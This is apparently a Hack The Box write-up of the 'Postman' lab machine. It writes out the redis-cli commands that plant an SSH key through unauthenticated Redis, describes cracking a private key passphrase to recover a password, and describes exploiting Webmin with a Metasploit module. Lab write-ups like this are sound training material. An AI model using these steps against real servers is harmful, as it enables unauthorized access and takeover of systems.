Let’s get started!
This is the initial step in order to scan the open services in the machine.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Following the indications in Pentesting Redis of the book HackTricks I try to connect to redis
without credentials (and it worked!) and I extract some information from the service.
The most interesting information was the path of the .ssh folder of the user redis inside
the box :
After checking all i found the path to ssh folder.
Knowing this path and following the indications in Pentesting Redis of the book HackTricks I
created a new ssh key, uploaded the public key to the authorized_keys files and login via
ssh using the redis user :
Generate ssh key pair with ssh-keygen.
(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt Adding 2 lines before and after the public key will ensure that it is parsed correctly.
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
10.10.10.160:6379> config set dbfilename “authorized_keys”
Let’s connect to ssh.
Then, once inside the machine I enumerated it using the script linpeas from the Suite PEAS .
This script found one interesting file:
Which turns out that could be the private ssh key of the user Matt
After downloading, extracting the hash from the key in john format and cracking it, you can
find that the password used to encrypt the key is computer2008
But if you try to login inside Matts account via ssh using the extracted ssh_key with that
password you won’t be able to login. This is because it is not the current private ssh key of
Matt. But the computer2008 its Matts password, so you can su into Matts.
If you try to login inside the https://Postman:10000 service using the discovered
credentials ( Matt : computer2008 ) you will see that they are working !
Then, knowing some valid credentials and knowing the version of the running software
We can exploit a well known vulnerability of this version of the service:
So just exploit it using the metasploit module . To do so, set the password , username
rhosts , and ssl (to true)
If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r